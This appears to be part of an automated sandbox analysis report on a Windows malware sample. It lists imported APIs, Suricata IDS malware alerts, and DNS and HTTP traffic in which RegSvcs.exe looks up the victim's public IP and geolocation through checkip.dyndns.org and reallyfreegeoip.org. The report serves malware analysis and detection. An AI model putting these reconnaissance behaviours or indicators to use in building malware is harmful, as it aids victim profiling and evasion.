GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T23:16:02.394160+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49705	132.226.8.169	80	TCP
2025-01-10T23:16:10.200043+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49711	132.226.8.169	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 23:15:57.166055918 CET	49705	80	192.168.2.8	132.226.8.169
Jan 10, 2025 23:15:57.170952082 CET	80	49705	132.226.8.169	192.168.2.8
Jan 10, 2025 23:15:57.173957109 CET	49705	80	192.168.2.8	132.226.8.169
Jan 10, 2025 23:15:57.174272060 CET	49705	80	192.168.2.8	132.226.8.169
Jan 10, 2025 23:15:57.179024935 CET	80	49705	132.226.8.169	192.168.2.8
Jan 10, 2025 23:16:00.047271967 CET	80	49705	132.226.8.169	192.168.2.8
Jan 10, 2025 23:16:00.063252926 CET	49705	80	192.168.2.8	132.226.8.169
Jan 10, 2025 23:16:00.068027020 CET	80	49705	132.226.8.169	192.168.2.8
Jan 10, 2025 23:16:02.343054056 CET	80	49705	132.226.8.169	192.168.2.8
Jan 10, 2025 23:16:02.354680061 CET	49710	443	192.168.2.8	104.21.80.1
Jan 10, 2025 23:16:02.354717970 CET	443	49710	104.21.80.1	192.168.2.8
Jan 10, 2025 23:16:02.354806900 CET	49710	443	192.168.2.8	104.21.80.1
Jan 10, 2025 23:16:02.364574909 CET	49710	443	192.168.2.8	104.21.80.1
Jan 10, 2025 23:16:02.364603996 CET	443	49710	104.21.80.1	192.168.2.8
Jan 10, 2025 23:16:02.394160032 CET	49705	80	192.168.2.8	132.226.8.169
Jan 10, 2025 23:16:02.835916042 CET	443	49710	104.21.80.1	192.168.2.8
Jan 10, 2025 23:16:02.836015940 CET	49710	443	192.168.2.8	104.21.80.1
Jan 10, 2025 23:16:02.841547012 CET	49710	443	192.168.2.8	104.21.80.1
Jan 10, 2025 23:16:02.841572046 CET	443	49710	104.21.80.1	192.168.2.8
Jan 10, 2025 23:16:02.841866970 CET	443	49710	104.21.80.1	192.168.2.8
Jan 10, 2025 23:16:02.894083023 CET	49710	443	192.168.2.8	104.21.80.1
Jan 10, 2025 23:16:02.901658058 CET	49710	443	192.168.2.8	104.21.80.1
Jan 10, 2025 23:16:02.943330050 CET	443	49710	104.21.80.1	192.168.2.8
Jan 10, 2025 23:16:03.115793943 CET	443	49710	104.21.80.1	192.168.2.8
Jan 10, 2025 23:16:03.115847111 CET	443	49710	104.21.80.1	192.168.2.8
Jan 10, 2025 23:16:03.115936041 CET	49710	443	192.168.2.8	104.21.80.1
Jan 10, 2025 23:16:03.132353067 CET	49710	443	192.168.2.8	104.21.80.1
Jan 10, 2025 23:16:04.868712902 CET	49711	80	192.168.2.8	132.226.8.169
Jan 10, 2025 23:16:04.873642921 CET	80	49711	132.226.8.169	192.168.2.8
Jan 10, 2025 23:16:04.875927925 CET	49711	80	192.168.2.8	132.226.8.169
Jan 10, 2025 23:16:04.876127958 CET	49711	80	192.168.2.8	132.226.8.169
Jan 10, 2025 23:16:04.880980968 CET	80	49711	132.226.8.169	192.168.2.8
Jan 10, 2025 23:16:07.685738087 CET	80	49711	132.226.8.169	192.168.2.8
Jan 10, 2025 23:16:07.694042921 CET	49711	80	192.168.2.8	132.226.8.169
Jan 10, 2025 23:16:07.698904991 CET	80	49711	132.226.8.169	192.168.2.8
Jan 10, 2025 23:16:10.156029940 CET	80	49711	132.226.8.169	192.168.2.8
Jan 10, 2025 23:16:10.172553062 CET	49712	443	192.168.2.8	104.21.80.1
Jan 10, 2025 23:16:10.172585011 CET	443	49712	104.21.80.1	192.168.2.8
Jan 10, 2025 23:16:10.172662973 CET	49712	443	192.168.2.8	104.21.80.1
Jan 10, 2025 23:16:10.177314043 CET	49712	443	192.168.2.8	104.21.80.1
Jan 10, 2025 23:16:10.177340031 CET	443	49712	104.21.80.1	192.168.2.8
Jan 10, 2025 23:16:10.199973106 CET	80	49711	132.226.8.169	192.168.2.8
Jan 10, 2025 23:16:10.200042963 CET	49711	80	192.168.2.8	132.226.8.169
Jan 10, 2025 23:16:10.637379885 CET	443	49712	104.21.80.1	192.168.2.8
Jan 10, 2025 23:16:10.637531996 CET	49712	443	192.168.2.8	104.21.80.1
Jan 10, 2025 23:16:10.639298916 CET	49712	443	192.168.2.8	104.21.80.1
Jan 10, 2025 23:16:10.639322042 CET	443	49712	104.21.80.1	192.168.2.8
Jan 10, 2025 23:16:10.639766932 CET	443	49712	104.21.80.1	192.168.2.8
Jan 10, 2025 23:16:10.691001892 CET	49712	443	192.168.2.8	104.21.80.1
Jan 10, 2025 23:16:10.711543083 CET	49712	443	192.168.2.8	104.21.80.1
Jan 10, 2025 23:16:10.759342909 CET	443	49712	104.21.80.1	192.168.2.8
Jan 10, 2025 23:16:10.933824062 CET	443	49712	104.21.80.1	192.168.2.8
Jan 10, 2025 23:16:10.933897018 CET	443	49712	104.21.80.1	192.168.2.8
Jan 10, 2025 23:16:10.933990955 CET	49712	443	192.168.2.8	104.21.80.1
Jan 10, 2025 23:16:10.964124918 CET	49712	443	192.168.2.8	104.21.80.1
Jan 10, 2025 23:17:07.338828087 CET	80	49705	132.226.8.169	192.168.2.8
Jan 10, 2025 23:17:07.338956118 CET	49705	80	192.168.2.8	132.226.8.169
Jan 10, 2025 23:17:14.995863914 CET	80	49711	132.226.8.169	192.168.2.8
Jan 10, 2025 23:17:14.996022940 CET	49711	80	192.168.2.8	132.226.8.169
Jan 10, 2025 23:17:42.349926949 CET	49705	80	192.168.2.8	132.226.8.169
Jan 10, 2025 23:17:42.355021000 CET	80	49705	132.226.8.169	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 23:15:57.153175116 CET	51610	53	192.168.2.8	1.1.1.1
Jan 10, 2025 23:15:57.160032988 CET	53	51610	1.1.1.1	192.168.2.8
Jan 10, 2025 23:16:02.346396923 CET	61315	53	192.168.2.8	1.1.1.1
Jan 10, 2025 23:16:02.353791952 CET	53	61315	1.1.1.1	192.168.2.8
Jan 10, 2025 23:16:10.162197113 CET	54142	53	192.168.2.8	1.1.1.1
Jan 10, 2025 23:16:10.171426058 CET	53	54142	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 23:15:57.153175116 CET	192.168.2.8	1.1.1.1	0xb8f4	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:16:02.346396923 CET	192.168.2.8	1.1.1.1	0x856b	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:16:10.162197113 CET	192.168.2.8	1.1.1.1	0xc237	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 23:15:57.160032988 CET	1.1.1.1	192.168.2.8	0xb8f4	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 23:15:57.160032988 CET	1.1.1.1	192.168.2.8	0xb8f4	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:15:57.160032988 CET	1.1.1.1	192.168.2.8	0xb8f4	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:15:57.160032988 CET	1.1.1.1	192.168.2.8	0xb8f4	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:15:57.160032988 CET	1.1.1.1	192.168.2.8	0xb8f4	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:15:57.160032988 CET	1.1.1.1	192.168.2.8	0xb8f4	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:16:02.353791952 CET	1.1.1.1	192.168.2.8	0x856b	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:16:02.353791952 CET	1.1.1.1	192.168.2.8	0x856b	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:16:02.353791952 CET	1.1.1.1	192.168.2.8	0x856b	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:16:02.353791952 CET	1.1.1.1	192.168.2.8	0x856b	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:16:02.353791952 CET	1.1.1.1	192.168.2.8	0x856b	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:16:02.353791952 CET	1.1.1.1	192.168.2.8	0x856b	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:16:02.353791952 CET	1.1.1.1	192.168.2.8	0x856b	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:16:10.171426058 CET	1.1.1.1	192.168.2.8	0xc237	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:16:10.171426058 CET	1.1.1.1	192.168.2.8	0xc237	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:16:10.171426058 CET	1.1.1.1	192.168.2.8	0xc237	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:16:10.171426058 CET	1.1.1.1	192.168.2.8	0xc237	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:16:10.171426058 CET	1.1.1.1	192.168.2.8	0xc237	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:16:10.171426058 CET	1.1.1.1	192.168.2.8	0xc237	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:16:10.171426058 CET	1.1.1.1	192.168.2.8	0xc237	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49705	132.226.8.169	80	2352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:15:57.174272060 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 23:16:00.047271967 CET	682	IN	HTTP/1.1 502 Bad Gateway Date: Fri, 10 Jan 2025 22:15:59 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jan 10, 2025 23:16:00.063252926 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 23:16:02.343054056 CET	682	IN	HTTP/1.1 502 Bad Gateway Date: Fri, 10 Jan 2025 22:16:02 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49711	132.226.8.169	80	6840	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:16:04.876127958 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 23:16:07.685738087 CET	682	IN	HTTP/1.1 502 Bad Gateway Date: Fri, 10 Jan 2025 22:16:07 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jan 10, 2025 23:16:07.694042921 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 23:16:10.156029940 CET	682	IN	HTTP/1.1 502 Bad Gateway Date: Fri, 10 Jan 2025 22:16:09 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jan 10, 2025 23:16:10.199973106 CET	682	IN	HTTP/1.1 502 Bad Gateway Date: Fri, 10 Jan 2025 22:16:09 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49710	104.21.80.1	443	2352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:16:02 UTC	73	OUT	GET /xml/ HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 22:16:03 UTC	769	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:16:03 GMT Content-Type: text/xml Content-Length: 362 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rfRnaus%2BTY6YGIr3Z1TMUI9IJhAYITW4HDGAAvziXZa1d1uSB%2BtivJWSOFXcLbbosgE2LcaAp9MzXqJWtTEIy1aA%2B48KWYZG4Dwy0a7hkTTi0yWe7ZJl5YjAKASRTaN3vMhvb%2BY8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9000077a7a51c443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3973&min_rtt=1679&rtt_var=2165&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=687&delivery_rate=1739130&cwnd=244&unsent_bytes=0&cid=1f111647326dd96d&ts=288&x=0"
2025-01-10 22:16:03 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49712	104.21.80.1	443	6840	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:16:10 UTC	73	OUT	GET /xml/ HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
